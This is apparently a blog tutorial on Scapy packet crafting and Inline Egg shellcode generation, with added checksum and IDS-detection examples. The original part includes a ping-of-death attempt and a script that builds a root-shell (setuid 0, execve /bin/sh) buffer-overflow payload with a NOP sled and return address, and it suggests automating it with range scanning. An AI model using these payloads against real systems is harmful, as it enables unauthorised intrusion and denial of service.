Between Scapy and Inline Egg, scripting network probes and [remote] buffer overflows has gotten much simpler. Scapy lets you
interactively craft packets and send/receive them; once you've debugged the packet construction, you can drop it into a Python
script for re-use. Inline Egg takes care of crafting NUL-free opcode sequences (shellcode) for hijacking running processes.
Scapy comes with a slew of protocols and handy tools like traceroute, arpcachepoison, p0f, etc. Here's an example of
interactively crafting some pings:
# normal ping
>>> ip = IP(dst="192.168.1.1")
>>> pkt = ip/ICMP()/"0xDECAFBAD"
>>> ans,unans = sr( pkt )
Begin emission:
.Finished to send 1 packets.
*
Received 2 packets, got 1 answers, remaining 0 packets
>>> ans.hexraw()
0000 08:11:27.604624 IP / ICMP 192.168.1.50 > 192.168.1.1 echo-request 0 / Raw ==> IP / ICMP 192.168.1.1 > 192.168.1.50 echo-reply 0 / Raw / Padding
0000 30 78 44 45 43 41 46 42 41 44 0xDECAFBAD
# ping of death
>>> pkt = ip / ICMP() / "0xDECAFBAD"*6551
>>> ans,drops = sr( pkt )
..Begin emission:
............................
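Here is an added example, not from the original post and not Scapy's own code, showing what Scapy does underneath ip/ICMP()/"0xDECAFBAD": it packs the ICMP echo header by hand, computes the RFC 1071 checksum, parses the packet back and verifies the checksum, and checks the IPv4 total length against the 65535-byte limit that the ping-of-death packet above (a 65510-byte payload) exceeds. Python 3 standard library only; the identifier and sequence values are made up.

```python
# Added example (not from the original post, not Scapy code): the ICMP echo
# header, RFC 1071 checksum and IP size check that Scapy handles for you.
import struct

ICMP_ECHO_REQUEST = 8
ICMP_HDR_LEN = 8            # type, code, checksum, identifier, sequence
IPV4_MIN_HDR_LEN = 20       # assumes no IP options
IPV4_MAX_TOTAL_LEN = 65535  # the 16-bit IP total-length field


def inet_checksum(data: bytes) -> int:
    """RFC 1071 Internet checksum: one's-complement sum of 16-bit words."""
    if len(data) % 2:
        data += b"\x00"      # pad odd-length data with a zero byte
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:       # fold carries back into the low 16 bits
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def build_echo_request(payload: bytes, ident: int = 0, seq: int = 0) -> bytes:
    """ICMP echo request with a correct checksum (the header Scapy fills in)."""
    header = struct.pack("!BBHHH", ICMP_ECHO_REQUEST, 0, 0, ident, seq)
    csum = inet_checksum(header + payload)
    return struct.pack("!BBHHH", ICMP_ECHO_REQUEST, 0, csum, ident, seq) + payload


def parse_echo(packet: bytes) -> dict:
    """Decode an ICMP echo header; the checksum is valid when the sum over
    the whole packet (header with checksum included) folds to zero."""
    if len(packet) < ICMP_HDR_LEN:
        raise ValueError("truncated ICMP header")
    icmp_type, code, csum, ident, seq = struct.unpack("!BBHHH", packet[:ICMP_HDR_LEN])
    return {
        "type": icmp_type,
        "code": code,
        "id": ident,
        "seq": seq,
        "payload": packet[ICMP_HDR_LEN:],
        "checksum_ok": inet_checksum(packet) == 0,
    }


def ipv4_total_length(icmp_packet: bytes) -> int:
    """Size of the IPv4 datagram carrying this ICMP message (no IP options)."""
    return IPV4_MIN_HDR_LEN + len(icmp_packet)


def is_oversized(icmp_packet: bytes) -> bool:
    """True when the datagram cannot fit the 16-bit IP total-length field,
    which is what the classic ping of death relied on."""
    return ipv4_total_length(icmp_packet) > IPV4_MAX_TOTAL_LEN


if __name__ == "__main__":
    # constructed inputs: the payloads from the session above
    normal = build_echo_request(b"0xDECAFBAD", ident=0x1234, seq=1)
    print(normal.hex())
    print(parse_echo(normal))
    big = build_echo_request(b"0xDECAFBAD" * 6551)
    print("total length", ipv4_total_length(big), "oversized:", is_oversized(big))
```

Sending these bytes still needs a raw socket (or Scapy), which is exactly the part Scapy makes convenient; the point here is that the checksum and the size check are what a receiver can validate before it trusts the packet.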
Inline Egg has a lot of power; check out the basic shellcode creation below.
One just needs to parametrize this and add some range scanning, and you have a very usable automated tool.
import inlineegg.inlineegg as ie
import struct
import sys

def stdinShellEgg():
    # Linux/x86 syscall flavour; FreeBSDx86Syscall and OpenBSDx86Syscall also exist
    egg = ie.InlineEgg(ie.Linuxx86Syscall)
    egg.setuid(0)
    egg.setgid(0)
    # argv must be a tuple: ('sh') is just the string 'sh', ('sh',) is a one-tuple
    egg.execve('/bin/sh', ('sh',))
    return egg

def main():
    # create egg
    egg = stdinShellEgg()
    code = egg.getCode()
    # exploit: NOP sled, then the shellcode, then the return address repeated
    retAddr = struct.pack('<L', 0xbffffc24L)  # little-endian, the address used in the original
    toSend = "\x90" * (1024 - len(code))
    toSend += code
    toSend += retAddr * 20
    print toSend

main()
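For the defender's side of the buffer the script above builds, here is an added example (not from the original post and not Inline Egg code) of the classic IDS heuristic for such payloads: flag a long run of 0x90 NOPs next to a 4-byte word repeated many times, as a return address would be. The thresholds, the stand-in "shellcode" bytes and the benign sample are constructed assumptions; the return address is the one from the script above. Python 3.

```python
# Added example (not from the original post, not Inline Egg code): a NOP-sled /
# repeated-return-address heuristic of the kind old IDS signatures used.
import struct
from collections import Counter

NOP = 0x90
MIN_SLED_LEN = 64        # assumed threshold for a contiguous NOP run
MIN_ADDR_REPEATS = 8     # assumed threshold for a repeated 32-bit word


def longest_byte_run(buf: bytes, value: int) -> int:
    """Length of the longest contiguous run of `value` in buf."""
    best = run = 0
    for b in buf:
        run = run + 1 if b == value else 0
        best = max(best, run)
    return best


def repeated_dword(buf: bytes, min_repeats: int):
    """Most frequent non-NOP 4-byte word, tried at all four alignments so the
    scan does not depend on where the suspect region starts."""
    nop_word = bytes([NOP]) * 4
    best = (None, 0)
    for phase in range(4):
        words = [buf[i:i + 4] for i in range(phase, len(buf) - 3, 4)]
        counts = Counter(w for w in words if w != nop_word)
        if counts:
            word, n = counts.most_common(1)[0]
            if n > best[1]:
                best = (word, n)
    return best if best[1] >= min_repeats else (None, 0)


def inspect_buffer(buf: bytes) -> dict:
    """Summarise the two indicators and give a verdict."""
    sled = longest_byte_run(buf, NOP)
    word, n = repeated_dword(buf, MIN_ADDR_REPEATS)
    return {
        "nop_sled_len": sled,
        "repeated_word": word.hex() if word else None,
        "repeats": n,
        "suspicious": sled >= MIN_SLED_LEN and n >= MIN_ADDR_REPEATS,
    }


# Constructed sample with the layout of the script above: 40 stand-in
# "shellcode" bytes (not real code) padded to 1024 with NOPs, then the
# return address repeated 20 times.
FAKE_CODE = bytes(range(1, 41))
SAMPLE_EXPLOIT = (b"\x90" * (1024 - len(FAKE_CODE)) + FAKE_CODE
                  + struct.pack("<L", 0xbffffc24) * 20)
# Constructed benign sample for comparison.
SAMPLE_BENIGN = b"GET / HTTP/1.1\r\nHost: example\r\n\r\n"

if __name__ == "__main__":
    print(inspect_buffer(SAMPLE_EXPLOIT))
    print(inspect_buffer(SAMPLE_BENIGN))
```

Both indicators are easy to evade (a sled of equivalent single-byte instructions instead of 0x90, a single return address), which is why this kind of rule is a triage signal rather than a verdict on its own.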